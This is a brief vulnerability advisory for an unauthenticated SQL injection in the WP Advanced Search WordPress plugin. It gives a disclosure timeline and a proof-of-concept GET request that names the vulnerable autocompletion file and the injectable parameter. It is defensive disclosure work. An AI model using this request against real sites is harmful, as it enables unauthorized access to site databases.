Due to using string concatenation, allowing direct access to a vulnerable PHP file and missing best-practices for coding SQL operations, there exists an unauthenticated SQL injection in autocompletion-PHP5.5.php.
After a month of trying to contact the Plugin author (Twitter, email), we followed generally accepted disclosure guidelines.
April 1st, 2020 - Report received & Escalated to WP Plugins Team
April 1st, 2020 - WP Plugin Team Investigating & Plugin closed
April 2nd, 2020 - Disclosing
April 3rd, 2020 - v3.3.6 released, fixing the issue
|Proof of Concept
GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[INJECT]&type=&e= HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate